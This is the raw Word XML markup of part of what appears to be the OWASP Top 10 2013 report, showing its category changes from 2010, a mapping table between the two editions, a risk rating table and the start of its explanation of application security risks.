        <w:t>Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F572BD4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protection (other than access control which is covered by 2013-A4 and 2013-A7) from the moment sensitive data is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E395575" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>provided by the user, sent to and stored within the application, and then sent back to the browser again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890437E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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5)     We added: 2013-A9: Using Known Vulnerable Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A1862" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="384" w:lineRule="exact"/>
        <w:ind w:left="144"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+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>This issue was mentioned as part of 2010-A6 – Security Misconfiguration, but now has a category of its own as the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340638C0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="97"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>growth and depth of component based development has significantly increased the risk of using known vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBECB9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D756047" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFB735C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6209"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="397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OWASP Top 10 – 2010 (Previous)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31"/>
        </w:rPr>
        <w:t>OWASP Top 10 – 2013 (New)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B857C05" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="425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1 – Injecti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1 – Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF39F5C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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3 – Broken Authentication and Session Management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2 – Broken Authentication and Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F357A92" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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2 – Cross-Site Scripting (XSS)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3 – Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABE71D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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4 – Insecure Direct Object References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4 – Insecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE2698" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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6 – Security Misconfigurati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5 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB4DA3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="43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7 – Insecure Cryptographic Storage – Merged with A9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Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>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6 – Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE5DCD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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8 – Failure to Restrict URL Access – Broadened in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Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>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7 – Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1576B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="434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5 – Cross-Site Request Forgery (CSRF)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8 – Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB36475" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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&lt;buried in A6: Security Misconfiguration&gt;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9 – Using Known Vulnerable Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21CC60" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="436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10 – Unvalidated Redirects and Forwards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10 – Unvalidated Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA39B2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5545"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="437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9 – Insufficient Transport Layer Protecti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erged with 2010-A7 into new 2013-A6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48742BB1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2BBD10D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="5"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0F3B3B3B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="210"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="723AFECE">
          <v:shapetype id="_x0000_t0" o:spid="_x0000_m2829" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
            <v:stroke joinstyle="miter"/>
            <v:path gradientshapeok="t" o:connecttype="rect"/>
          </v:shapetype>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="1"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:pict w14:anchorId="5C4E07D1">
          <v:shape id="_x0000_s0" o:spid="_x0000_s2828" type="#_x0000_t0" style="position:absolute;left:0;text-align:left;margin-left:11pt;margin-top:491pt;width:5in;height:112.75pt;z-index:251171328;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;v-text-anchor:middle" o:allowincell="f" filled="f" stroked="f">
            <v:textbox style="mso-next-textbox:#_x0000_s0"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8"/>
                    <w:gridCol w:w="1161"/>
                    <w:gridCol w:w="1161"/>
                    <w:gridCol w:w="1161"/>
                    <w:gridCol w:w="1059"/>
                    <w:gridCol w:w="1080"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00C534F5" w14:paraId="3E40A664" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="576"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="97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67231462" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="243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Threat</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="47D1DEE6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="23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5961070D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="34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Attack</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7A587455" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="29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2E73CF53" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="20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Weakness</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2BE5731A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="17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Prevalence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1C7D7F05" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="20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Weakness</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="157E9CBD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="103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Detectability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354FC1CC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="18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Technical</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4FCA7F5B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="23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2684B481" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="22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Business</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4C0D88A9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="2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435712DA" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="360"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="978" w:type="dxa"/>
                        <w:vMerge w:val="restart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13C32DA" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="540" w:lineRule="exact"/>
                          <w:ind w:left="313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</w:rPr>
                          <w:t>App</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0D77BDF3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="15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</w:rPr>
                          <w:t>Specific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45BEC435" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="417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Easy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4279F02F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="141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Widespread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5B000720" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="417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Easy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2B1E3E7A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="28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Severe</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1080" w:type="dxa"/>
                        <w:vMerge w:val="restart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24F9EB8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
                          <w:ind w:left="2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</w:rPr>
                          <w:t>App /</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0388CEDE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="252" w:lineRule="exact"/>
                          <w:ind w:left="163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</w:rPr>
                          <w:t>Business</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3274BBD8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="252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</w:rPr>
                          <w:t>Specific</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00C534F5" w14:paraId="08005FE2" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="360"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="978" w:type="dxa"/>
                        <w:vMerge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E7B16AC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="252" w:lineRule="exact"/>
                        </w:pP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B200"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="5321D0C0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="28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Average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B200"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="535230C9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="246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Common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B200"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="13268376" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="28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Average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B200"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="478E03AF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="165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Moderate</w:t>
                        </w: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E3024CC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="287" w:lineRule="exact"/>
                        </w:pPr>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00C534F5" w14:paraId="0FC18E41" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="360"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="978" w:type="dxa"/>
                        <w:vMerge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16B164E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="287" w:lineRule="exact"/>
                        </w:pP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54436076" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="29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Difficult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37D87C90" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="150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Uncommon</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1161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072F7728" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="295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Difficult</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1059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42FB0103" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="287" w:lineRule="exact"/>
                          <w:ind w:left="307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8"/>
                          </w:rPr>
                          <w:t>Minor</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="1080" w:type="dxa"/>
                        <w:vMerge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262B4DF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="287" w:lineRule="exact"/>
                        </w:pPr>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="0F7B12C8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388EB4D1">
          <v:shape id="imagerId64" o:spid="_x0000_s2827" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-252034560;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId64" o:title="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Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C1255" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="210"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D384728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Application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Security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Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EA22C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73704740" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356A5737" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA0A149" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C585239" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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What Are Application Security Risks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13573358" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13597A55" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB6CDAB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="224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Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCFB35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se paths represents a risk that may, or may not, be serious enough to warrant attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DCAD0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1A9A6E00" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="337" w:lineRule="exact"/>
        <w:ind w:left="629" w:firstLine="12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="55BB923D">
          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
            <v:stroke joinstyle="miter"/>
            <v:path gradientshapeok="t" o:connecttype="rect"/>
          </v:shapetype>
          <v:shape id="wondershare_53" o:spid="_x0000_s2826" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:114.1pt;margin-top:167.4pt;width:206.2pt;height:32pt;z-index:-251679232;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="41BA9FE0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="2324"/>
                    </w:tabs>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="34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323232"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Vectors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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:noProof/>
                      <w:color w:val="323232"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Securit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7E5FF9C">
          <v:shape id="wondershare_61" o:spid="_x0000_s2825" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:374.3pt;margin-top:167.4pt;width:182.85pt;height:32pt;z-index:-251673088;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w14:paraId="640576E8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1815"/>
                    </w:tabs>
                    <w:autoSpaceDE w:val="0"/>
                    <w:autoSpaceDN w:val="0"/>
                    <w:adjustRightInd w:val="0"/>
                    <w:spacing w:after="0" w:line="34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323232"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Impacts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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                      <w:b/>
                      <w:noProof/>
                      <w:color w:val="323232"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Business</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox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323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AB7B7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="161" w:lineRule="exact"/>
        <w:ind w:left="629"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6A66B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="337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323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B46E3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7C2B6181" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="258" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="94"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27489969" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="341" w:lineRule="exact"/>
        <w:ind w:firstLine="12"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
